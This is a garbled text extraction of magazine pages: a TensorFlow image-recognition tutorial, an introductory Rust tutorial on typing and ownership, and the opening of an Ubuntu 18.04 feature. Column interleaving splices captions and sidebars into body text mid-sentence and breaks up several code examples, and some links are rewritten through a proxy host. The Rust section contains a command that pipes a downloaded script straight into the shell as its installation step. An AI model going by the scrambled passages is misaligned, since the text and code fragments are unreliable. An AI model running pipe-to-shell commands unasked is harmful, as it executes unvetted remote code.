TensorFlow then acts as the engine that traverses these input layer, a number of
graphs and executes all the operations that have been intermediate layers,
defined. These features are accessible through the and an output layer
low-level API in TensorFlow, but most people don’t need output
to work with that much detail, so there is a higher-level
API that provides data import functions to manage
creation of the data structures from many common data
file formats. Then there are a series of functions called
estimators. These estimators create entire models, and
their underlying graphs, so that you can simply run the
estimator to do the data processing that is needed.

Inception-v3
One of the tasks for which TensorFlow has shown its
usefulness is image recognition, and therefore a lot of
work has been done to improve its performance in this
area. When you start developing your own algorithms, the
work done in the image-recognition estimators would be
well worth your time to investigate. One family of image
recognition estimators is called Inception, with the most
current release being version 3.
The Inception models were trained using a data data. If you have already downloaded the model, you can
set called ImageNet, put together in 2012 to act as a indicate this to the script with the command line option
standard set to test and compare image-recognition --model_dir to specify the directory where it’s stored.
Then to have it classify your own images, you can hand
them in with the command line option --image_file.
When you start To test it, you can use the default image of a panda. When
you run it, you should get output like the following. Visualising
developing your own models with
python ./classify_image.py TensorBoard
algorithms, the work giant panda, panda, panda bear, coon bear, When working
Ailuropoda melanoleuca (score = 0.89107) with networks
done in image-recognition indri, indris, Indri indri, Indri and models,
brevicaudatus (score = 0.00779) it can become
estimators would be worth lesser panda, red panda, panda, bear cat, difficult to
cat bear, Ailurus fulgens (score = 0.00296) figure out what
your time to investigate custard apple (score = 0.00147) is actually
earthstar (score = 0.00117) happening.
To help, the
systems. It contains more than 14 million URLs to As you can see, this outputs the top five matches for developers
images that were annotated (by humans) to indicate what TensorFlow thinks your image might be, together have provided
the objects pictured; there are more than 20 thousand with a confidence score (in case you were wondering, a tool called
ambiguous categories, with each category, such as ‘roof’ an earthstar is a type of fungus!). If you want, you TensorBoard to
or ‘mushroom’, containing several hundred images. can change the number of returned matches with the help visualise the
Luckily, Inception-v3 is a fully trained model that you command line option --num_top_predictions. learning that is
can download and use to experiment with. Once you being processed.
have TensorFlow installed, download Inception from the Tune the net In order to use
GitHub repository with the following commands: While the Inception model is very good, it’s designed to it, you need
be as general as possible and to be able to identify a wide to have your
git clone https://github.com/tensorflow/ range of categories. But you may want to tune the model code generate
models.git to be even better at identifying some smaller subset of summary data,
cd models/tutorials/image/imagenet types of images. In these cases, you can reuse the bulk which can then
of the Inception model and just replace the last layer be read by
In this folder, you’ll find the Python script classify_ of the neural network to be specific for your new image TensorBoard and
image.py. Assuming you haven’t run this script category. In the main TensorFlow GitHub repository that produce detailed
before, and haven’t downloaded the model data at you need to download, there is a Python script that gives information for
some other time, it will start by downloading the file an example of how to retrain the inception model, which you model.
inception-2015-12-05.tgz so that it has the model you can run with the following example code.

www.linuxuser.co.uk 49
Tutorial TensorFlow: Image Recognition

python tensorflow/examples/image_retraining/ then train a new final layer, which can be quite tedious
Using retrain.py --image_dir ~/my_images to carry out – but you can shorten the process by using
TensorFlow a useful wrapper known as TF-Slim. As you can see,
Mobile This script takes all of the images in the directory we have only touched the code necessary in the most
When you have my_images and retrains the model using each image. cursory way in the material above. We haven’t had the
a model trained This simple a retraining process can still take 30 minutes space available to dig into much of the detail that you
and are using it or more. If you were to do a full training of the model, it require in order to get any work done, and indeed this is
in some project, could take a huge number of hours. There are several a well-known complaint people have with TensorFlow.
you have the other options available, including selecting a different
ability to move model to act as a starting point. There are other smaller
it onto what models that are faster, but not as general. If you’re With the TF-Slim
may seem like writing a program to be run on a low-power processor,
underpowered such as a phone app, you may decide to select one of module loaded, a lot of the
hardware these instead.
by using the boilerplate code that needs
Tensorflow Training on new data
Mobile libraries While the above example may be fine for the majority of to be written when working
available at the people, there may be cases where you need more control
TensorFlow site. than this. Fortunately, you can manually manage the in TensorFlow is wrapped
This can move retraining of your model. The first step is to load the data
very intensive for the model; the following code lets you do this. and taken care of for you
deep-learning
applications out graph = tf.Graph() To help alleviate this issue you can use that wrapper
to devices such with graph.as_default(): layer of code, TF-Slim, to minimise the amount of code
as smartphones with tf.gfile.FastGFile('classify_image_ that you need in order to get some useful work done.
or tablets. graph_def.pb', 'rb') as file: TF-Slim is available in the contrib portion of the
graph_def = tf.GraphDef() TensorFlow installed package, and you can import it with
graph_def.ParseFromString(file.read()) the following code:
tf.import_graph_def(graph_def, name='')
import tensorflow.contrib.slim as slim
This loads the model and creates a new graph object. The
graph is made up of several layers, all leading to a final With the TF-Slim module loaded, a lot of the boilerplate
output layer. code that needs to be written when working in
TensorFlow is wrapped and taken care of for you.
last_layer = graph.get_tensor_by In TF-Slim, models are defined by a combination of
name('pool_3:0') variables, layers and scopes. In regular TensorFlow,
Below There’s a creation of variables requires quite a bit of initialisation
complete tutorial This final layer is what does the final classification and on whichever device the data is being stored and used on.
available as an IPython makes the ultimate decision as to what it thinks your TF-Slim wraps all of this so that it’s simplified to become
notebook in the image is. At this point, you can process your specialised a single function call. For example, the following code
models repository for images to create a new final layer. There are several creates a regular variable containing a series of zeroes.
TensorFlow steps required in order to preprocess the images, and
my_var = slim.variable('my_var', shape=[20, 1],
initializer=tf.zeros_initializer())

Getting the list of variables in the model is also simplified


to the following.

regular_variables_and_model_variables =
slim.get_variables()

Building layers for a neural network under TF-Slim is also


greatly simplified. In plain TensorFlow code, creating a
single convolutional layer can take seven lines of code.
In TF-Slim, this collapses down to the following two lines
of code.

input = ...
net = slim.conv2d(input, 128, [3, 3],
scope='conv1_1')

50
TF-Slim also includes 13 other built-in options for
layers, including fully connected and unit norm layers. Canned Estimators Models in a box
It even simplifies creating multiple layers with a repeat
function. For example, the following code creates three
convolutional layers.
Estimator Keras Train and evaluate models
net = slim.repeat(net, 3, slim.conv2d, 256, Model
[3, 3], scope='conv3')
Build models
This makes the task of retraining a given model to Layers
be more finely tuned much easier. You can use these
wrapper functions to create a new layer with only a few
lines of code and replace the final layer of an already built
model. Luckily, there is a very good example of how you Python Front-end C++
Front-end ...
can do this, which is available within the models section
of the TensorFlow source repository at GitHub. There is a
complete set of Python scripts written to help with each
of the steps we’ve already discussed. There are scripts
to manage converting image data to the TensorFlow TensorFlow Distributed Execution Engine
TFRecord data format, as well as scripts to automate the
retraining of image recognition models. There is even an
IPython notebook, called slim_walkthrough.ipynb, that
takes you through the creation of a new neural network, CPU GPU Android iOS ...
training it on a given dataset, and the final application of
the neural network on production data.

Training a new layer exploding in popularity recently. There is still one area Above Tensorflow has
Once you have a new layer constructed, or perhaps that has performance problems, however: the training a layered structure,
you have created an entirely new neural network from of the models in the first place. For example, training building up from a
scratch, you still have to train this new layer. In order to the Inception image-recognition model takes weeks of core graph execution
retrain a given network, you need to create a starting processing time. This is why quite a bit of development engine all the way
point with the following code. time has been put into including GPU support for this up to high-level
stage of TensorFlow usage – and it’s also why you estimators
model_path = '/path/to/pre_trained_on_ should use a pre-trained model, such as the Inception
imagenet.checkpoint' model we’ve been discussing, whenever you have the
variables_to_restore = slim.get_variables_to_ opportunity.
restore(...) The Inception-V3 model took weeks to train, even with
init_fn = assign_from_checkpoint_fn(model_ 50 GPUs crunching the network data. When you are doing
path, variables_to_restore) your own training, there are few things you can do to help
with performance. One of them is to try to bundle your
Once you have this starting point, you can start the file I/O into larger chunks. Accessing the hard drive is one
retraining with the code below. of the slowest processes on a computer; if you can take
multiple files and combine them into larger collections,
train_op = slim.learning.create_train_op(...) reading them is made more efficient. The second option
log_dir = '/path/to/my_model_dir/' you have is to use fused operations in the actual training
slim.learning.train(train_op, log_dir, init_ step. This takes multiple processing operations and
fn=init_fn) combines them into single fused operations, to minimise
function-call overhead.
You can then run this newly created model to get it to
do actual work. To help, the TF-Slim code repository Where next?
includes a script called evaluation.py to help you do this We’ve only been able to cover the process of image
processing step. If you have something specific that you recognition and retraining of neural networks in the most
need to do, you can use this script as a starting point to superficial way in this tutorial. There are a large number
write your own workflow scripts. of complicated steps involved in working with these types
of models.
Performance implications My hope is that this short article has been able to
The developers behind TensorFlow have put a lot of highlight the overall concepts, and includes enough
work into making the final, trained models fairly snappy external resources to help point you to sources of the
in terms of performance. This is one of the reasons details you would need to be able to add this functionality
why deep learning and neural networks have been to your own projects.

www.linuxuser.co.uk 51
Tutorial Introduction to Rust

Rust: An introduction to
safe systems programming
Learn some of the safety features inside one of
John
Gowers the best-loved programming languages today
John is a
university tutor
in Programming
and Computer
Science. He likes
to install Linux
on every device
he can get his
hands on and
has extensive
programming
experience.

Resources
Rust and Cargo
Installation (details
are included in
the article)

Above If you’re familiar with C, it shouldn’t take long to get to grips with Rust

Rust, in a nutshell, is a safe C. Developed in the last hope that you’ll gain some appreciation of what Rust
10-12 years under the sponsorship of Mozilla, it quickly does and how it can help us catch bugs much earlier than
took on a number of safety features that are directly other languages.
useful within software engineering projects. At its To start, we need to install the Rust compiler to our
heart, it’s a systems programming language just as system. In order to download it manually, you can visit
C is, but it combines low-level access to the machine with https://sh.rustup.rs, which will automatically download
elegant features, such as strong typing and ownership, a shell script, rustup-init.sh. Running this script will
that help Rust programmers avoid bugs and memory install Rust on your system. You can perform installation
leaks much more effectively than they could in C – or in a single command as follows:
in similar languages such as C++.
Today, Rust is hugely popular, owing to its elegance $ curl https://sh.rustup.rs/ | sh
and robustness. In fact, it was named the most-loved
language in the Stack Overflow developer survey in Alternatively, your distribution’s package manager might
2016, 2017 and 2018. have a Rust package on it already. If that’s the case, it’s a
good idea to install Rust using it. This will give you a more
Getting started robust installation, and will help you keep track of Rust
We’ll assume that you know a bit about systems on your system. We’ll start with a simple “Hello world”
programming in C/C++. Much of the syntax of Rust is program. Open a command window, create a folder
the same as that of C; where there are differences, they somewhere on your system in order to hold the code,
are for the purpose of making the language safer and and navigate to it. We’ll also need to fire up a text editor
less prone to error than C, directly targeting common to write our code. Create a file called hello.rs inside the
problems such as null pointers and memory leaks. We folder we’ve just created, and add the following code to it.

52
fn main() { number data types Figure 1 Left Rust provides
println!("Hello, world!"); good support for many
} Size Signed type Unsigned type different integer and
floating point types,
If you’re used to C you’ll notice some similarities, but a 8 bit integer i8 u8 so you are never left
number of differences as well. To start, notice that the guessing about how
function that runs when the program starts is called 16 bit integer i16 u16 many bits your data
main, as it is in C, and that the syntax is broadly the same. takes up
Some differences include the keyword fn to declare a 32 bit integer i32 u32
function (which is not part of C) and the exclamation mark
! after the function println. This exclamation mark in 64 bit integer i64 u64
fact means that println is not a normal function but a
macro, but we don’t need to worry about that for now. 64bit / 32bit int
Go into the command window, and type the following (platform int isize usize
to compile your program. size)

$ rustc hello.rs 32 bit float f32

This creates an executable, which we can run in the


64 bit float f64
normal way:

$ ./hello
Hello, world! int x = 'A' * 'B' / 'C';
printf("%c\n", x);
Package management with Cargo
Almost all Rust projects use the special built-in package- Multiplying and dividing characters shouldn’t make
management system called Cargo. If you installed Rust sense, and neither should putting them into integer
using the installation script, it will already be installed. values. Weak typing is sometimes useful, but on the
If you installed Rust from your package manager, there’s whole it tends to obscure bugs in the code. If we have
a chance that you will have to install Cargo separately. code in which we are multiplying character values
You can check whether Cargo is installed by running the together, it is very likely that we are making a mistake.
following command. If the compiler allows us to do this without complaining,
we could be unaware of that mistake until much later on,
$ cargo --version when it might be a lot more difficult to track down. Rust
is considered ‘safe’ precisely because it stops you doing
Cargo is incredibly useful for keeping track of things that shouldn’t make sense.
dependencies in projects. In order to turn our Rust
project into a Cargo project, we’ll need to go through
a few extra steps. First, let’s go back a directory, using If we have code in
$ cd ... Then use the following command to create
a new directory that will hold our Cargo project. which we are multiplying
$ cargo new hello_cargo --bin character values together,
Created binary (application) 'hello_cargo'
project it’s very likely that we are
$ cd hello_cargo
making a mistake
Look at the contents of this directory with $ ls and
you’ll see that it contains a file called Cargo.toml and a For example, let’s go into the file main.rs inside the src
directory called src. The src directory already contains directory and add the following lines of code into the main
a file, main.rs, that is exactly the same as the hello. function.
rs that we created earlier. In fact, we can run it straight
away from inside the hello_cargo directory using the let letter_a = 'A';
command cargo run. We won’t be using the capabilities let letter_b = 'B';
of Cargo in this tutorial, but it’s a good idea to get into the let product = letter_a * letter_b;
habit of using it so you can take advantage of it later on.
When we try to compile this code using cargo run, Rust
Variables and typing will display a clear error message:
Strong typing is central to the safety features provided
by Rust. In C, it is perfectly legal to write code like this: $ cargo run

www.linuxuser.co.uk 53
Tutorial Introduction to Rust

Right for loops are Compiling hello_cargo v0.1.0 Figure 3


the most common type error[E0369]: binary operation '*' cannot
of loop used in Rust be applied to type 'char' for i in 1..4 {
println!("{}!", i * 2);
Rust is telling us that we cannot use the multiplication
}
operation to multiply two character values. However, if
println!("Who do we appreciate?");
we use numeric values rather than characters, Rust will
allow us to perform the multiplication. Replace all the
2!
code inside the main function with the following.
4!
let number_seven = 7; 6!
let number_thirteen = 13; 8!
let product = number_seven * number_ Who do we appreciate?
thirteen;
println!("{} x {} = {}.", number_seven,
number_thirteen, product); We’ve introduced a few new things here, so let’s go over
them. In order to create a variable in Rust, we use the
Running cargo run should now give use the correct let keyword, followed by the variable name, followed by
output, like this: an equals sign = and the initial value. The initialisation is
optional, but is usually a good idea, since Rust uses the
7 x 13 = 91. initial value in order to work out what type the variable
should have. For example, the variable number_seven
Right Rust supports Figure 2 is initialized to the number 7, so Rust automatically
basic looping gives it the type i32, which is the type of a 32-bit signed
constructs. We can loop { Again! integer. If we want to tell Rust which type to use, rather
break out of any loop println!("Again!"); Again! than letting it work it out for itself, we can add a type
using the break; } Again! annotation to the variable declaration. For example:
keyword, as in C ...
let large_number: u64 = 1000;
while i <=8 { 5!
The type u64 is the type of unsigned 64-bit integers.
println!("{}!", i); 6!
There is a full list of Rust’s different integer and floating-
i = i + 1; 7! point types in Figure 1.
} 8! Rust is good at stopping you, for example, from
declaring an unsigned-type variable to be equal to -1.
It will give you a warning if you try to initialise a variable
with a value that overflows its bounds.
Using external crates Sometimes, Rust is unable to infer the type of a
You might wonder why we went to the trouble of variable, and will give an error message to that effect.
turning our project into a Cargo project. Well, Cargo is In these cases, giving a type annotation is mandatory.
a powerful tool, which is why it’s so widespread. One However, Rust is quite well set up in order to ensure that
use for it is to quickly install new code packages so this is not necessary most of the time.
that we can use them in our code, called ‘crates’. The other new thing is the println! syntax. A bit like
For example, let’s install a crate that will enable C’s printf, println! enables us to insert placeholders
us to generate random numbers. The crate in {} into our string whose values are filled in according to
question is called rand, and is provided in the Cargo the other parameters to the function. These parameters
repositories. To ensure it’s installed, we need to can be strings, characters or numbers. For example, the
modify the Cargo.toml file in our project directory. If following command
it isn’t there already, add a single line containing the
text [dependencies] at the bottom, followed by the println!("L{}n{}x {}", 1, 'u', "User");
line rand = “0.4". If we run cargo run, Cargo should
install the rand crate. prints out the string L1nux User.
To use the crate in our code, we need to add the
following line to the top of main.rs: extern crate mut and shadowing
rand;. This line is necessary in order to load the crate So far, variables in seem to be the same as the ones we
into our program. Then, below this line, add the line would find in C. But try replacing the contents of the main
use rand::Rng; to bring the Rng module into scope. function with the following.
Now we can call rand::thread_rng().gen(); inside
our code to generate a random integer. let x = 2;
x = 3;

54
When we try to compile this code using cargo run, Figure 5
Rust gets angry and presents us with the error message Control-flow
cannot assign twice to immutable variable. What fn solve_quadratic_equation(a: f64, statements
this illustrates is that variables in Rust are immutable b: f64, c: f64) -> (f64, f64) { While we haven’t
by default – that is, they hold one particular value and let d = (b * b) - (4.0 * a * c); mentioned them
cannot be assigned to more than once. let first_solution = (-b + d.sqrt()) much here, Rust
The reason for this is that immutable variables are / (2.0 * a); has plenty of
much safer in general than mutable ones, especially in let second_solution = (-b - control-flow
complex multithreaded systems, where changes in the d.sqrt()) / (2.0 * a); statements;
values of variables makes behaviour of the system much (first_solution, second_solution) the looping
harder to reason about. We recommend that you stick to } constructs are
immutable variables as far as possible. illustrated in
Nevertheless, sometimes mutable variables are useful. Figures 2 and
fn main() {
An example is the while loop in Figure 2. To tell Rust that 3. The simplest
a variable should be mutable, we use the mut keyword.
let (solution_1, solution_2) = looping construct
solve_quadratic_equation(1.0, is loop, which
let mut i = 0; -5.0, 6.0); starts an
i = 1; // Compiles fine. println!("{} {}", solution_1, infinite loop.
solution_2); The while loop
An alternative to using mut is what Rust calls ‘shadowing’. } is slightly more
Shadowing is when we use the same name for two sophisticated,
different variables in the same scope. For example: and loops
You should use shadowing rather than mut if you have round as long
let x = 0; the chance, since it avoids introducing actual mutable as a specified
let x = 1; variables. Shadowing is, however, less powerful than Boolean
mutability: indeed, it is nothing more than a syntactic condition is true.
Here, the second line let x = 1; creates a new variable sugar for immutable variables. The while loop in Figure The for loop can
called x and assigns it the value 1. From this point, 2 doesn’t work with shadowing, because in this case the be used to iterate
whenever we refer to x in the code, we are referring condition i <= 8 refers to the original i, rather than the over collections
to the second variable (unless we shadow again and shadowed value. such as arrays
produce a third variable called x). Functionally, there is no and ranges.
difference between this and calling the second variable Functions
y or something else: we do it in order to avoid having to No systems programming language would be complete
think up new variable names. Since it is impossible to without the ability to write our own functions. We have
refer to the original variable x once we have shadowed already seen one example of a function: the main() Above Left The
it, you should treat shadowing as a more limited form function that runs when the program starts. main() does idiomatic way to return
of mutability: you can imagine that the variable x has not take any input, but we can also write functions that a value from a function
changed value from 0 to 1, as long as you remember that take in values as parameters. For example, we could in Rust is to put the
they are in fact two separate immutable variables. write the little program shown in Figure 4, which prints ‘return value’ as the
out the two solutions to a quadratic equation (assuming last statement in the
Figure 4 that equation has only real solutions). function, without a
One thing that is important to notice is that the semicolon
fn solve_quadratic_equation(a: f64, parameters to a function must always take type
b: f64, c: f64) { signatures. Here, we have required that the numbers Left Rust requires us
let d = (b * b) - (4.0 * a * c); a, b and c be 64-bit floating point types. One reason for to give type signatures
println!("The first solution is {}", this restriction is that the main tool Rust uses to infer for parameters to a
(-b + d.sqrt()) / (2.0 * types of variables is by looking at when they are passed function, so that we
a)); into or out of functions. So, by forcing us to specify types don’t need to give
println!("The second solution is {}", of function parameters, Rust is better able to enable them elsewhere
(-b - d.sqrt()) / (2.0 * us not to include them elsewhere. For example, when
a)); we call solve_quadratic_equation(1.0, -5.0, 6.0);
Rust knows that the number 5.0 should be a 64-bit float
}
precisely because we have included the type signature in
the function.
fn main() { We can also return values from functions. The syntax
solve_quadratic_equation(1.0, -5.0, for this is a bit different from that used in C, and is more
6.0); similar to that of functional languages such as Haskell.
} We use the arrow -> to specify the return value of a
function. For example, in Figure 5 we have a modified
version of the quadratic equation function from Figure 4

www.linuxuser.co.uk 55
Tutorial Introduction to Rust

that returns the values rather than print them. Here, we


Enums have used one of Rust’s special tuple types in order to
Figure 7
and match return a pair of floating point values. fn steal_ownership(x: Box<i32>) {
Rust enables Notice that we do not need to use a return statement println!("{} stolen!", x);
us to create to return the value; it suffices to put the value that we }
enum types that want to return on the last line of the function, without a
can take on a semicolon. Rust also supports a return statment like
fn main() {
specified set the one in C if we want to return values in the middle of a
of values. One function’s code.
let current_year = Box::new(2018);
useful thing steal_ownership(current_year);
we can do with Ownership println!("{}", current_year);
enums is to So far we have not explored any safety features that // Doesn’t compile!
match on their really make Rust special. Plenty of languages, for }
values: that example, are strongly typed. Ownership is a new Rust
is, if we have a concept; it is quite hard to grasp, but can make programs
variable v of a much safer. The idea is that when we have some okay to free it. If we free memory and then try to use it, or
particular enum dynamically allocated memory on the heap, exactly one if we try to free memory twice, the program will crash.
type, we can variable ‘owns’ that memory at any one time, and the Some languages, such as Java, get around this
specify what lifetime of that variable controls when the memory is problem by using a garbage collector to automate the
to do for every allocated and freed. freeing of memory. But this approach can lead to large
value that v could performance overheads, which we want to avoid with a
take on. There’s systems programming language. Rust adopts a different
an example in De-referencing an approach: there is no garbage collector, but memory is
Figure 6: the still freed automatically.
cmp()function invalidated pointer in Rust The way that Rust avoids the problems of having
returns a value mutiple variables all pointing to the same memory
of the enum type causes a compiler error, address is simple: you can only ever have one variable
Ordering, which pointing to a particular piece of memory.
has three values: helping us to catch bugs Let’s illustrate this with an example. In Rust, we can
Less, Equal and use the function String::from to dynamically allocate
Greater. The much earlier on some memory for holding a resizable string.
match keyword
tells us what In C, we can dynamically allocate memory on the heap let magazine_name = "LU&D"; // fixed-length
to do in each of by using the function malloc. string
these cases. let magazine_name = String::from(magazine_
void *new_memory = malloc(1000 * name); // variable-length string
sizeof(int));
Here, we have used shadowing to avoid having to come
When we have finished with the memory, we should call up with separate names for the two string variables,
free(new_memory) to avoid taking up too many of the but there is an important difference between the two:
system’s resources. the first magazine_name is a string literal that occupies
Memory allocation is notoriously difficult in C, because a fixed area of memory on the stack. It is, therefore,
it is hard to keep track of memory and to know when it is impossible to change the size of this string. The second
magazine_name is dynamically allocated on the heap,
Above Right Whenever Figure 6 which means that it can support a number of string-
a function takes in a manipulation functions.
pointer/box variable as use std::cmp::Ordering; Now add the following lines of code at the end.
a parameter, it takes
ownership over the fn print_sign(x: i32) { let best_magazine = magazine_name;
bytes that the variable match x.cmp(&0) { println!("{}", magazine_name);
points to Ordering::Less =>
println!("Negative!"), If we run this code with cargo run, Rust gives us an error
Ordering::Equal => message. The reason is that when we ran the line let
Right A match println!("Zero!"), best_magazine = magazine_name, Rust transferred
statement is more Ordering::Greater => ownership of the string "LU&D" from the variable
reliable than a if/else
println!("Positive!"), magazine_name to the variable best_magazine, meaning
if/else construct, that the variable magazine_name is now invalid.
}
because it guarantees This might seem like strange behaviour, but it has
}
that every possibility an important purpose: it means that Rust can now
is dealt with automatically free the bytes that best_magazine points

56
Figure 8 Top Left Returning
Mutable references values from functions
fn borrow_ownership(x: Box<i32>) -> If you use references to pass values to functions can restore ownership
Box<i32> { without transferring ownership, you might notice that back to the calling
println!("{} borrowed!", x);
x
244 words
you can’t modify these values within the functions.
This is a deliberate design decision: since we can have
context

} multiple references pointing to the same piece of Left References are


data, it could cause problems if individual references the idiomatic way to
were allowed to modify this data, particularly in a ‘borrow’ a pointer/box
fn main() {
multi-threaded environment where individual threads variable: they allow us
let current_year = Box::new(2018);
are reading from the same data source. to read the value that
let current_year = borrow_ However, sometimes we do want to change the the variable points
ownership(current_year); value held at a particular reference, and we can to without taking
println!("{}", current_year); do this by using a mutable reference. To make a ownership
} reference mutable, we add the keyword mut, just as
we do for variables. For example, we could change the
declaration of the parameter in Figure 9 from
Figure 9 x: &Box<i32> to x: &mut Box<i32>.
Since allowing references to be mutable introduces
fn borrow_ownership(x: &Box<i32>) { problems when there are multiple references pointing
println!("{} borrowed!", x); to the same bytes, Rust is very restrictive about
} the use of mutable references. The rule is that if a
particular piece of data has a mutable reference
fn main() { pointing to it, there must be no other references to
let current_year = Box::new(2018); that data in the same scope. That way, we can freely
borrow_ownership(&current_year); modify the bytes that the reference points to without
worrying that there might be another reference trying
println!("{}", current_year);
to read that data.
}

to as soon as that variable goes out of scope. Other The function does not actually do anything much with the
languages can’t do this, because there’s always a chance parameter, but the fact that it takes in the value means
that some other variable is pointing to the same bytes. In that it also takes ownership of the bytes that it points to
Rust, on the other hand, there is a guarantee that such (which have the value 2018). When the function returns,
a situation can never occur, since it is impossible for x goes out of scope and the memory will be freed.
two variables to point to the same data; as soon as we This means that the code as it stands will not compile,
point a new variable to a piece of data, it automatically because the last println! statement refers to current_
invalidates the old pointer. year after it has been invalidated.
This is a bit like C++’s unique_ptr: if we have two We can stop this from happening by returning the value
unique_ptr pointers, we cannot set one to be equal back from the function, as in Figure 8. When we return a
to the other, but must instead use the move function, pointer value, we transfer ownership back to the calling
which invalidates the first pointer. The difference is that context. In this case, we have returned x, which gets put
‘invalidate’ here means that the first pointer is set to into the new (shadowed) variable current_year in the
null, so that attempting to de-reference it later on will main() function.
result in a segmentation fault at runtime. By contrast, This is fine, but it can be a bit annoying if we also want
de-referencing an invalidated pointer in Rust causes a to return separate values from the function. Luckily, Rust
compiler error, helping us to catch bugs much earlier on. provides a way of passing pointer values to functions that
does not transfer ownership.
Passing values For this we use something called a reference, which
Another way that ownership is transferred is by passing is a bit like a ‘borrowed value’: it allows us to look at the
values to functions. If we have a variable that points to contents of the box, but does not transfer ownership.
some bytes on the heap and we pass it into a function, Figure 9 shows a more concise version of the code in
the parameter inside that function takes ownership of Figure 8 using references. In order to signify that a
the variable. Let’s look at an example; for a change, we’ll parameter to a function is a reference, we need to put
use Rust’s Box::new instead of String::from. Box::new an ampersand & in front of the parameter name, and we
allocates some memory, initialising it to a given value, also need an & in front of the name of the variable we are
and returns the ‘boxed value’ – that is, a variable pointing passing in (in this case, current_year).
to that memory. There’s obviously a lot more to Rust than we can cover
The code in Figure 7 includes a function, steal_ in this introduction, but hopefully it has given you a taste
ownership, that takes a boxed integer as a parameter. of what this excellent language can do.

www.linuxuser.co.uk 57
Feature Ubuntu 18.04 LTS

top features
of

ubuntu
18. 4Ubuntu ‘Bionic Beaver’ 18.04 represents the first long term
support release of a new generation of the leading
Linux distribution, with over 30 exciting changes

58
W at a glance
hen major changes happen in a development, as it adjusts the focus of
distribution that’s as widely used its business. A year ago, founder Mark
as the Canonical-supported Shuttleworth announced that the company
Ubuntu, the Linux universe takes notice. would no longer focus on convergence • Desktop p60
Ubuntu’s release schedule is such that as its priority, and would instead look Ubuntu 18.04 ditches the Unity
seismic shifts typically take place outside to invest in areas that provided growing desktop and brings GNOME on X.Org
long term support (LTS) releases, before revenue opportunities – specifically in the to LTS for the first time in a long time.
then being included later in an LTS version. server and VM, cloud infrastructure, cloud
Ubuntu’s regular releases are supported for operations and IoT/Ubuntu Core markets. • Server p62
nine months, but for LTS releases it’s five While this broadening of focus might The Server release of Bionic Beaver
years, which means that a great deal of care at first appear as a cause for concern sports a much-improved installer and
and preparation takes place to ensure that for desktop users, the reality is quite a new, smaller ISO file for a minimal
what goes into a LTS is as stable as different. Ubuntu 17.10 demonstrated install option.
possible. The most recent big change in that a significant change to Ubuntu could
Ubuntu came with 17.10 Artful Aardvark, be delivered without disruption, and the • Cloud p64
which was released in October 2017. This company has also demonstrated a keen The latest Ubuntu release offers
interest in taking on tighter integration with Canonical’s
board user feedback cloud offerings and a simplified
Ubuntu continues to be a to help shape 18.04. deployment process.
A survey distributed
distribution that targets a broad to help choose the • Containers p66
Ubuntu default As well as a new release of LXD,
range of users: basic web or office applications elicited Ubuntu continues to offer support
tens of thousands for Kubernetes and Docker on public,
users, developers, sysadmins, of responses and private, hybrid or bare-metal clouds.
was used to refine
robotics engineers the release. Ubuntu • Core/IoT/Robotics p68
continues to be a Ubuntu is experiencing huge growth in
distribution that the areas of IoT players and robotics,
has provided a short but valuable window targets a broad range of users; basic web making use of Canonical’s investment
for developers to shake down the changes or office users, developers, sysadmins, in the snap ecosystem.
before deciding on exactly what makes the robotics engineers – they are all catered
cut for the LTS version; as you’ll see, not for. Of course, if the default Ubuntu
everything made it in, but 18.04 is isn’t quite to your taste, a wide range of beaver as having an “energetic attitude,
groundbreaking nonetheless. alternative flavours continue to be available industrious nature and engineering
Ubuntu 18.04 ‘Bionic Beaver’ represents a for a variety of use cases, hardware prowess”, which he then likened to Ubuntu
shift not only in technology, but also marks configurations or personal preference. contributors. Meanwhile, the ‘Bionic’ part
a change in perspective for Canonical, Why is this release called ‘Bionic Beaver’? is a hat-tip to the growing number of robots
the company that supports Ubuntu’s Well, Mark Shuttleworth described the running Ubuntu Core. Nice!

www.linuxuser.co.uk 59
Feature Ubuntu 18.04 LTS

Ubuntu Desktop
The new GNOME on Ubuntu era makes its way to LTS

S
hould you be upgrading to Ubuntu
18.04 (named after the fourth
month of 2018) from 17.10, the
latest version will feel like a regular
incremental upgrade, with the major
changes having happened in the last
release. If you’re upgrading from the last
LTS version, you’re in for more of a surprise.
The biggest visual change is the shift from
Unity to GNOME. Bionic ships with GNOME
version 3.28, running the ‘Ambiance’ theme
as always, and is tweaked to provide as
painless a transition as possible for existing
users. This also extends to running Nautilus
3.26 rather than the latest 3.28, as the latest
release removes the ability to put shortcuts
on the desktop. You do get a nice new Bionic
Beaver-themed desktop background of Above Ubuntu now includes GNOME 3.28, with tweaks and customisations designed to improve
course, with support for up to familiarity for migrating Unity users, together with an updated Nautilus look and feel
8K displays! The original
expectation was that kicking off last November, it wasn’t ready will be made available in the future via an
this release would in time for the 18.04 user-interface freeze official snap package. The intention is that
ship with an due to a number of outstanding bugs and the theme will appear as a separate session
all-new theme overall lack of broader testing. That’s on the login screen, making it straightforward
developed by the disappointing for sure, but given the nature to test and be reverted if needed, rather than
community, but of a LTS release, stability is always the having to use the GNOME Tweak Tool. One
unfortunately primary concern. With that said, for those other side-effect of the switch to GNOME is
despite work who want to install the new theme – called that the login screen is now powered by GDM
on the theme Communitheme – the expectation is that it rather than lightdm.

quick guide
Ubuntu flavours
Kubuntu Lubuntu Xubuntu
Kubuntu brings KDE Plasma to Lubuntu is a more lightweight Xubuntu provides another
Ubuntu, providing an alternative version of Ubuntu, running the lightweight alternative, using
high-end desktop environment LXDE desktop environment the Xfce desktop environment

If you’re switching to Ubuntu 18.04 from If you’re running Ubuntu on lower-spec Like Lubuntu, Xubuntu focuses on running
the last LTS release, you’re going to change hardware – perhaps even a Raspberry Pi – well on modest hardware, but has all the
your desktop environment anyway, so what the light but fully featured Lubuntu may be applications pre-installed to get you up
about trying KDE? The Qt-based desktop is worth a look. Unlike the main flavour, 32-bit and running right out of the box. Beautiful
fast, beautiful and quite a different option! images are still available. design also features extensively.

60
In addition to Communitheme, another of the Linux kernel. This version includes To-Do and the upgrading of LibreOffice to
feature that didn’t make the cut for Bionic, Meltdown and Spectre patches as well as version 6. The Linux office suite continues
and in fact has been restored from the secure, encrypted virtualisation and better to go from strength to strength, with
previous release, is the switch from X.Org graphics support for AMD processors, the latest release further developing the
to Wayland as the default display server. a whole host of new drivers, and a huge Notebookbar, adding even better forms
Once again the focus on stability and some number of minor fixes since version 4.13 support, providing enhanced mail merging,
outstanding issues meant that it just wasn’t and particularly since version 4.10 in the including initial OpenPGP support and
felt ready for prime-time. last LTS point release. boasting even better interoperability with
Snaps, the universal Linux packaging other (Microsoft) office suites.
